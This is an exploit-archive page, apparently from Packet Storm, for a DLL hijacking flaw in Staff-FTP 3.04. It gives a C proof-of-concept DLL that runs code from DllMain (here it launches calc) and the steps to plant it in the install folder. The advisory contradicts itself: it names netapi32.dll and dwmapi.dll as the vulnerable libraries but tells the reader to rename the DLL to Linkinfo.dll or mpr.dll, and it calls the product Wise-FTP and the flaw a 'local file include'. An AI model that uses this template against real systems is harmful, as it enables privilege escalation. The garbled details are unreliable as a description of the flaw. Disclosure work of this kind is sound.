exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Staff-FTP 3.04 DLL Hijack

Staff-FTP 3.04 DLL Hijack
Posted May 19, 2015
Authored by metacom

Staff-FTP version 3.04 suffers from a dll hijacking vulnerability.

tags | exploit
systems | windows
SHA-256 | 11c1ff88fbf2aec5cb130ee64073ba77c78b23e8c19fa3e3f0cf46b67b93c8b7

Staff-FTP 3.04 DLL Hijack

Change Mirror Download
A local dll injection vulnerability has been discovered in the official Staff-FTP v3.04 software.
The issue allows local attackers to inject code to vulnerable libraries to compromise the process or to gain higher access privileges.

The windows software is vulnerable to dll hijacking attacks. The vulnerability is located in the netapi32.dll and dwmapi.dll file extensions.
The software does not specify the fully qualified path to a dynamic-linked libraries (netapi32.dll and dwmapi.dll). The vulnerable version affects
the Wise-FTP v3.04 software. The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability
scoring system) count of 6.0.

Vulnerable Software:
[+] Staff-FTP

Vulnerable Version(s):
[+] v3.04

Vulnerable Libraries:
[+] netapi32.dll
[+] dwmapi.dll


Proof of Concept (PoC):
=======================
The dll hijack vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the local vulnerability ...
1. Compile dll and rename to Linkinfo.dll or mpr.dll
2. Copy Linkinfo.dll to C:\Program Files\Staff-FTP
3. Launch Staff-FTP

PoC: Exploit
#include <windows.h>

int alpdaemon()
{
WinExec("calc", SW_SHOW);
exit(0);
return 0;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved)
{
alpdaemon();
return 0;
}
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close